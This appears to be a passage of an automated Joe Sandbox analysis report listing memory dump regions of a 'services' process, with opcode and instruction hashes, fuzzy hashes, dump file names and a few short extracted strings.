                                                                • Instruction ID: 5c8348b33a9f180be6cefbe2f55706547d26e89739270fdfad43655f10ccdebe
                                                                • Opcode Fuzzy Hash: 973bd36c27a5d9b1acef65170dde0531987d8644b95f2bb0cb40c9dbcd994ae7
                                                                • Instruction Fuzzy Hash: 64E04F30408A4E8FDB94EF18E9052EA77A0FF54340F400526E81CC2180DB74A574C791
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 560875b869816e74aab0aa68f9e21dd2ccccf4e41b8c2f2235d54fa2a2aa36ea
                                                                • Instruction ID: 2dcc2f55b80b36907ac36d139a7c6945d2daa5843088016e470713d0293205e1
                                                                • Opcode Fuzzy Hash: 560875b869816e74aab0aa68f9e21dd2ccccf4e41b8c2f2235d54fa2a2aa36ea
                                                                • Instruction Fuzzy Hash: B0E04F3581D2C99FE771EF908A560EC7F60FF11380F5801E7D509471D2EB296A589646
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3409530622.00007FF849990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849990000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a67dced4f8cfc80b41fc136c7db4153b1dd4e334a7d2a541aa105f8afb35b17a
                                                                • Instruction ID: a6df1feafaa4036b039e70637253679b61ece50ed7ae8046202eda5c92c66bd0
                                                                • Opcode Fuzzy Hash: a67dced4f8cfc80b41fc136c7db4153b1dd4e334a7d2a541aa105f8afb35b17a
                                                                • Instruction Fuzzy Hash: 3EE0123090C58E8FEB64EE04C0A5ABE3BB6FF05344F200428D51AC7281C639A942C780
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3409530622.00007FF849990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849990000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a39c889fe8115a2da6a7dcccb08329c1112a674e651e3e1a18641cb86807767e
                                                                • Instruction ID: d6521cf968703afc35585addda7845502c55f764269248cd83a23b3aa96f5137
                                                                • Opcode Fuzzy Hash: a39c889fe8115a2da6a7dcccb08329c1112a674e651e3e1a18641cb86807767e
                                                                • Instruction Fuzzy Hash: 46D04274618A8E8FDB94EE0DC895A5A77E1FB64700F504550A429C7266CA34FC51CB80
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3385800716.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff848f40000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cb868490b48c218367858b25517e8320400bb7977ba4b664d641b2a31d201c68
                                                                • Instruction ID: f77d2e7985dd815708e407c101b950399ae3b211ec1c7fe6d9ca0c826ced98a8
                                                                • Opcode Fuzzy Hash: cb868490b48c218367858b25517e8320400bb7977ba4b664d641b2a31d201c68
                                                                • Instruction Fuzzy Hash: 3CE0EC3090981D9FE771EB18CC943AAB671EF84311F1042F5800EA6299CE342E828B80
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4b325eaacfe3e71f739a7a297d16ced70d129d28754c306d5ec5bc38144b417d
                                                                • Instruction ID: 72931cc1790d99224c5e4f434eed67fd09afa62bb4287d4d8285c09cd70baf7a
                                                                • Opcode Fuzzy Hash: 4b325eaacfe3e71f739a7a297d16ced70d129d28754c306d5ec5bc38144b417d
                                                                • Instruction Fuzzy Hash: 5AD0C954A0DAE78DF6797EC18560E3991A5AF21381E22403FC15F828C5CF1CB602AE09
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0078daf39e87aa0426dccabd76b4d788d610aa2f2f9ed6bf8e1ea0b22f85d295
                                                                • Instruction ID: e1926ace84dd3d2ce5456bc6c4ddb1877b03452850d2c96ae1cb54ca92971bf1
                                                                • Opcode Fuzzy Hash: 0078daf39e87aa0426dccabd76b4d788d610aa2f2f9ed6bf8e1ea0b22f85d295
                                                                • Instruction Fuzzy Hash: 8AD0CA60E1C5C39DF2BA7EC1827023EA9A19F56380EA0003ED09F428C2CF2CB801661A
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7d4c10f2c5c14c22a7e8cb2fc87a3e521df53a417e4f8777c23ce06f731aa2dc
                                                                • Instruction ID: b8cfd76fb99f24eb18868ca74db319859dde97d8735adb51971c360246ee01f2
                                                                • Opcode Fuzzy Hash: 7d4c10f2c5c14c22a7e8cb2fc87a3e521df53a417e4f8777c23ce06f731aa2dc
                                                                • Instruction Fuzzy Hash: 7FC04C14E0D2D39FE6316AB4485193916911F17284B150972D11ACA2C7D95CB8546A95
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3409530622.00007FF849990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849990000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 277acc98c63a14793f3f3410f1d77174e64074c62a8959c65a196864bde9dd7d
                                                                • Instruction ID: fc16a95de89d31b45b33f4167347b95637ad1b6745ec742ae0797fb7495fbfe9
                                                                • Opcode Fuzzy Hash: 277acc98c63a14793f3f3410f1d77174e64074c62a8959c65a196864bde9dd7d
                                                                • Instruction Fuzzy Hash: 86216A3184E3C24FD753AB7088285907FB0EF17254B0A42EBC095CB0E3EA5D185AD722
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3385800716.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff848f40000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: c9$!k9$"s9$#{9
                                                                • API String ID: 0-1692736845
                                                                • Opcode ID: 6a5dbac14c5d11ddaec2a0c634106d08482b247298901b981f54d69e8ad9f73c
                                                                • Instruction ID: 015c0e02d4608efab263b1d6b6206c7fb35a05466097148df057ca286b8f1b21
                                                                • Opcode Fuzzy Hash: 6a5dbac14c5d11ddaec2a0c634106d08482b247298901b981f54d69e8ad9f73c
                                                                • Instruction Fuzzy Hash: 78415B12A2B563A9E19237BDB4021FA6B64EF813BDF484777E04C9D0D34F1D609682ED
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3406849623.00007FF849880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849880000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849880000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: +$0$0${
                                                                • API String ID: 0-1355733333
                                                                • Opcode ID: 4e428f83e170e536d6dc07bcb1db22424f95fff2285e79789e7b88738190a634
                                                                • Instruction ID: a52d19d74774e89d5a4fa892e41e02c9327c84e3a9371cf95d625c09399f76ff
                                                                • Opcode Fuzzy Hash: 4e428f83e170e536d6dc07bcb1db22424f95fff2285e79789e7b88738190a634
                                                                • Instruction Fuzzy Hash: 89111C70E08299CFEB64DF45C894BB8B7F2EF54345F1085BAC01AA7284CB795986CF50